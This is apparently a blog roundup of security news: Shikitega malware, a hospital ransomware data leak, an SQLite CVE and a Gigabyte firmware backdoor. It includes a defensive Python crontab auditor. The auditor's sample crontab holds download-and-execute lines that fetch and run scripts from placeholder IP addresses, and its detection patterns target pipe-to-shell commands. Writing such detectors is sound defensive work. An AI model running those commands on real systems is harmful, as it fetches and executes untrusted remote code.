In which a blogger finds the private key used to sign Hyundai car software updates … by googling it. They used a key pair from a popular tutorial. 😂😂😂 pic.twitter.com/ydoWfjbvsR
— Daniel Feldman (@d_feldman) August 13, 2022
New Linux Cryptomining Malware:
The malware was dubbed “Shikitega” for its extensive use of the popular Shikata Ga Nai polymorphic encoder, which allows the malware to “mutate” its code to avoid detection. Shikitega alters its code each time it runs through one of several decoding loops that AT&T said each deliver multiple attacks, beginning with an ELF file that’s just 370 bytes.
Shikitega also downloads Mettle, a Metasploit interpreter that gives the attacker the ability to control attached webcams and includes a sniffer, multiple reverse shells, process control, shell command execution and additional abilities to control the affected system.
[…]
The final stage also establishes persistence, which Shikitega does by downloading and executing five shell scripts that configure a pair of cron jobs for the current user and a pair for the root user using crontab, which it can also install if not available.
Shikitega also uses cloud hosting solutions to store parts of its payload, which it further uses to obfuscate itself by contacting via IP address instead of domain name. “Without [a] domain name, it’s difficult to provide a complete list of indicators for detections since they are volatile and they will be used for legitimate purposes in a short period of time,” AT&T said.
Bottom line: Shikitega is a nasty piece of code. AT&T recommends Linux endpoint and IoT device managers keep security patches installed, keep EDR software up to date and make regular backups of essential systems.
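A defender-side check for the behaviour the excerpt describes (cron jobs for both the current user and root, payloads fetched from bare IP addresses rather than domain names) as an added example; it is not code from the AT&T report or from this post. The crontab lines are constructed samples, the IP addresses are documentation ranges rather than real indicators, and the heuristics are assumptions about what a suspicious entry looks like, not a signature for Shikitega.

```python
"""Audit crontab text for download-and-execute persistence patterns."""
import re
import subprocess
from typing import Dict, List

# Constructed sample crontab (documentation IP ranges, not real indicators).
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/local/bin/backup.sh
*/5 * * * * curl -s http://203.0.113.7/a.sh | sh
@reboot wget -q -O /tmp/.x http://198.51.100.9:8080/x && chmod +x /tmp/.x && /tmp/.x
30 2 * * 1 /usr/bin/apt-get update
"""

# URL whose host is a literal IPv4 address (optionally with a port).
IP_URL = re.compile(r"https?://(?:\d{1,3}\.){3}\d{1,3}(?::\d+)?")
# curl/wget output piped straight into a shell interpreter.
PIPE_TO_SHELL = re.compile(r"\b(?:curl|wget)\b[^|]*\|\s*(?:ba)?sh\b")
# Marking a file in a world-writable directory executable.
WRITABLE_EXEC = re.compile(r"chmod\s+\+x\s+(?:/tmp/|/var/tmp/|/dev/shm/)")


def audit_crontab(text: str) -> List[Dict]:
    """Return one finding per crontab entry that matches a heuristic.

    Each finding carries the 1-based line number, the entry text and the
    list of reasons it was flagged. Blank lines and comments are skipped.
    """
    findings = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        reasons = []
        if IP_URL.search(line):
            reasons.append("fetches from bare IP address")
        if PIPE_TO_SHELL.search(line):
            reasons.append("pipes download to shell")
        if WRITABLE_EXEC.search(line):
            reasons.append("executes from world-writable dir")
        if reasons:
            findings.append({"line": lineno, "entry": line, "reasons": reasons})
    return findings


def audit_current_user() -> List[Dict]:
    """Audit the invoking user's crontab via `crontab -l` (empty if none).

    Run as root as well, since the excerpt notes jobs are installed for
    both the current user and root.
    """
    proc = subprocess.run(["crontab", "-l"], capture_output=True, text=True)
    if proc.returncode != 0:
        return []
    return audit_crontab(proc.stdout)


if __name__ == "__main__":
    for f in audit_crontab(SAMPLE_CRONTAB):
        print(f"line {f['line']}: {f['entry']}")
        for r in f["reasons"]:
            print(f"    - {r}")
```

On a real host, feed it the output of `crontab -l` for each user plus the files under /etc/cron.d and /var/spool/cron; the heuristics only raise leads for a human to triage, and a legitimate job that fetches from an internal IP will trigger the first check by design.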
The hacker group that orchestrated a cyberattack against the Centre Hospitalier Sud Francilien in Corbeil-Essonnes began releasing data on Friday after the hospital refused to pay the ransom demanded, AFP learned on Sunday from a source close to the case.
The hackers had set the hospital a deadline of 23 September to pay the ransom. Once the deadline expired, they released a batch of data, the source close to the case added. The data "appears to concern our patients, our staff and our partners". It includes "certain administrative data", including social security numbers, and "certain health data such as examination reports and in particular external anatomical cytopathology records, radiology, analysis laboratories, doctors", the hospital went on.
Trail of Bits disclosed today CVE-2022-35737, an arbitrary code execution in SQLite
— Catalin Cimpanu (@campuscodi) October 25, 2022
The vulnerability affects all SQLite versions released in the past 22 years (and 19 days) https://t.co/w0ShgtEZw7 pic.twitter.com/l2Y7kdl12L
Godzil (./1940):
Interesting, there's plenty of closed-source stuff that uses SQLite......
Plenty of stuff, full stop, really.
Our follow-up analysis discovered that firmware in Gigabyte systems is dropping and executing a Windows native executable during the system startup process, and this executable then downloads and executes additional payloads insecurely. It uses the same techniques as other OEM backdoor-like features like Computrace backdoor (a.k.a. LoJack DoubleAgent) abused by threat actors and even firmware implants such as Sednit LoJax, MosaicRegressor, Vector-EDK. Subsequent analysis showed that this same code is present in hundreds of models of Gigabyte PCs. We are working with Gigabyte to address this insecure implementation of their app center capability.
In the interest of protecting organizations from malicious actors, we are also publicly disclosing this information and defensive strategies on a more accelerated timeline than a typical vulnerability disclosure. This backdoor appears to be implementing intentional functionality and would require a firmware update to completely remove it from affected systems. While our ongoing investigation has not confirmed exploitation by a specific threat actor, an active widespread backdoor that is difficult to remove poses a supply chain risk for organizations with Gigabyte systems.
Claiming to be surprised would be a lie.